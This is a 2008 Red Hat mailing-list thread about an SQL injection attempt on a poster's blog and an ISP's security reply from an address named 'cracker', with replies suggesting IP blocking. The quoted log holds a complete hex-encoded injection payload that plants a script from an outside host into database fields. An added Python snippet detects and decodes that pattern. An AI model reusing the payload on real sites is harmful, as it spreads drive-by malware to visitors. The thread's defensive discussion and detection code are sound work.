08-27-2008, 04:04 AM
Jose R R

Infiltration of ISP providers by crackers.

So ...(sigh) what do you do when you complain to a given ISP provider about
a case of attempted abuse by one of their IP addresses and you get a
response from someone in the "security team" whose email name is "cracker?"

Apparently some (or many) of these crackers own (with their consent or not)
even their ISP providers --or worse, some (or many) ISP providers may be
crackers themselves!

A portion of my original complaint to the ISP --where I list one of the
attempted abuse records by the cracker for informational purposes:

----------------------------------------------------------------------------------
from: myself <my_email_address>
to: network-adm@hinet.net, network-center@hinet.net
date: Mon, Aug 25, 2008 at 11:37 PM
subject: Abuse by user at IP address 118.167.20.180
mailed-by: my_domain

On August 25, 2008, from 08:52:10 am to 08:52:28 am (America/Tijuana time),
user at IP address 118.167.20.180 abused <my> web site with the below
referenced offending code (relevant web server log section is attached and
named as abuse-118_167_20_180.txt).

118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET
/blog/index.php/2008/07/12/
xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20@S
%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054 207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F 7220435552534F5220464F522073656C65637420612E6E616D 652C622E6E616D652066726F6D207379736F626A6563747320 612C737973636F6C756D6E73206220776865726520612E6964 3D622E696420616E6420612E78747970653D27752720616E64 2028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E787479 70653D31363729204F50454E205461626C655F437572736F72 204645544348204E4558542046524F4D20205461626C655F43 7572736F7220494E544F2040542C4043205748494C45284040 46455443485F5354415455533D302920424547494E20657865 632827757064617465205B272B40542B275D20736574205B27 2B40432B275D3D2727223E3C2F7469746C653E3C7363726970 74207372633D22687474703A2F2F777777302E646F7568756E 716E2E636E2F63737273732F772E6A73223E3C2F7363726970 743E3C212D2D27272B5B272B40432B275D2077686572652027 2B40432B27206E6F74206C696B6520272725223E3C2F746974 6C653E3C736372697074207372633D22687474703A2F2F7777 77302E646F7568756E716E2E636E2F63737273732F772E6A73 223E3C2F7363726970743E3C212D2D27272729464554434820 4E4558542046524F4D20205461626C655F437572736F722049 4E544F2040542C404320454E4420434C4F5345205461626C65 5F437572736F72204445414C4C4F43415445205461626C655F 437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Foxy/1; Foxy/1; .NET CLR 1.1.4322)"

[...]

I would appreciate your cooperation in stopping this sort of cracker
engagement.

Thank you in advance for your prompt attention to this issue.

---------------End of portion of email sent----------------------------------------------------------------------------



Below is an interesting section of one of the replies:

-------------------------------------------------------------------

Return-Path: <my_email_address>
Received: from localhost (localhost [127.0.0.1])
by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
m7QA4XUN014545
for <cracker@localhost>; Tue, 26 Aug 2008 18:06:31 +0800
[...]

----------End of unformatted reply----------------------------------------------------------


The above was attached to the formatted email reply below:

----------------------------------------------------------------------

from: cracker@hinet.net
to: <my_email_address>
date: Tue, Aug 26, 2008 at 4:24 AM
subject: [HiNetSOC/Craker : 1219749049]HiNet Notification(HiNet 通知)
mailed-by: lcss.hinet.net


Dear Sir:

Thank you for your email. Please kindly provide us more detail information
about the bad behavior at least including the attackers' IP address, time
(GMT, Greenwich Mean Time) and evidence for further processing.

Yours sincerely,

HiNet Security Operation Center
Chunghwa Telecom Co., Ltd.
Taipei, Taiwan, R.O.C.
Email: cracker@hinet.net

Please refer to your original report email and the attached file.

------End of formatted email reply-------------------------------------------------------------------

No wonder spam and intrusion attempts never end.

Jose R R
http://www.metztli-it.com

IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH
and SuSE; official Ubuntu support coming at the end of August 2008.
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
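Two parts of the exchange above lend themselves to automation on the defender's side: spotting this hex-encoded `DECLARE ... CAST(0x... AS CHAR) ... EXEC(@S)` pattern in the web server log, and converting the log's local timestamp to GMT, which is exactly what HiNet's reply asks for. The Python below is an added example, not code from the post or from the list: the log lines are constructed (TEST-NET addresses, and a CAST blob that decodes to a harmless `SELECT 1`), and the signature regex is my own, not a vendor rule.

```python
import binascii, re
from datetime import datetime, timezone
from urllib.parse import unquote

# Apache "combined" log entry, the format of the line quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Shape of the injected T-SQL in the post: DECLARE @S ...; SET @S=CAST(0x.. AS CHAR(..)); EXEC(@S);
# Hypothetical signature written for this example, not a vendor rule.
SQLI_RE = re.compile(
    r"DECLARE\s+@\w+.*?CAST\(0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+CHAR\(\d+\)\).*?EXEC\(@\w+\)",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample log (TEST-NET addresses); the first entry mimics the post's, with a CAST blob that decodes to a harmless SELECT 1.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Aug/2008:08:52:10 -0700] "GET /blog/index.php?blog=4\';DECLARE%20@S%20'
    'CHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 400 567 '
    '"-" "Mozilla/4.0 (compatible; MSIE 7.0)"',
    '198.51.100.9 - - [25/Aug/2008:08:53:01 -0700] "GET /blog/index.php?blog=4 HTTP/1.1" 200 8123 '
    '"-" "Mozilla/5.0"',
]

def to_utc(ts):
    """Convert '25/Aug/2008:08:52:10 -0700' to '2008-08-25 15:52:10 GMT' (the form HiNet asked for)."""
    dt = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S GMT")

def detect_hex_sqli(path):
    """Return the hex-decoded CAST payload when the request matches the signature, else None."""
    m = SQLI_RE.search(unquote(path))
    if m is None:
        return None
    # Decoded for the analyst's report only; nothing here executes the SQL.
    return binascii.unhexlify(m.group("hex")).decode("latin-1")

def triage(lines):
    """Parse log lines and return one abuse-report record per matching request."""
    hits = []
    for line in lines:
        rec = LOG_RE.match(line.strip())
        if rec is None:
            continue  # unparseable line: skip rather than guess
        payload = detect_hex_sqli(rec.group("path"))
        if payload is not None:
            hits.append({"ip": rec.group("ip"), "time_utc": to_utc(rec.group("ts")),
                         "status": int(rec.group("status")), "payload": payload})
    return hits

if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(f"{h['time_utc']}  {h['ip']}  HTTP {h['status']}  decoded payload: {h['payload']!r}")
```

The 400 status on the matching line is worth keeping in the report: it records that the PHP blog rejected the request, so the entry is evidence of an attempt, not of a compromise.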
 
08-27-2008, 11:41 AM
Burke, Thomas G.

Infiltration of ISP providers by crackers.

Personally, I just blocked all of apnic... They're the source of over 90% of my issues, and I don't really care if I make them mad.

Of course, you might not be able to do that if you're running a business...

-----Original Message-----
From: redhat-list-bounces@redhat.com [mailto:redhat-list-bounces@redhat.com] On Behalf Of Jose R R
Sent: Wednesday, August 27, 2008 12:05 AM
To: General Red Hat Linux discussion list
Subject: Infiltration of ISP providers by crackers.

 
08-27-2008, 11:52 AM
George Magklaras

Infiltration of ISP providers by crackers.

I do not normally bother following up on reports on all attacks. Most of
them are scripted and there are too many. So, my IPS/IDS has a good list
of 'not-to-block' IP addresses and whatever else outside this IP list
attacks any service is blocked. Most good IPS/IDS vendors also provide
near real-time lists of network blocks, especially from countries with
large ISP segments that typically consist of various classes of IP
blocks for home DSL/dialup customers, where most of the compromised PCs
serve botnets and malicious scripters. This keeps the number of IPTABLES
rules down and can block most of these annoying attacks.


GEO-IP blocking may also help if you definitely know that you should not
be expecting traffic from any part of the world. The problem is that you need to
update the IP list regularly and be ready to accept some false positives
from IPs that suddenly are legit.


For other types of more persistent and unusual attacks, you need to get
in touch with the CERT team of a major telco provider. They are keen to
know of these issues and if they provide the backbone of your
connectivity, maybe there is part of your SLA that covers this sort of
thing, generally speaking.



GM

--
George Magklaras

Senior Computer Systems Engineer/UNIX Systems Administrator
EMBnet Technical Management Board
The Biotechnology Centre of Oslo,
University of Oslo
http://folk.uio.no/georgios



 
08-28-2008, 03:05 AM
Jose R R

Infiltration of ISP providers by crackers.

> On Wed, Aug 27, 2008 at 4:41 AM, Burke, Thomas G. <tg.burke@ngc.com> wrote:
>> [...]

On Wed, Aug 27, 2008 at 4:52 AM, George Magklaras <georgios@biotek.uio.no> wrote:
> [...]

Your insights and suggestions are appreciated, thank you.

Jose R R
http://www.metztli-it.com
 
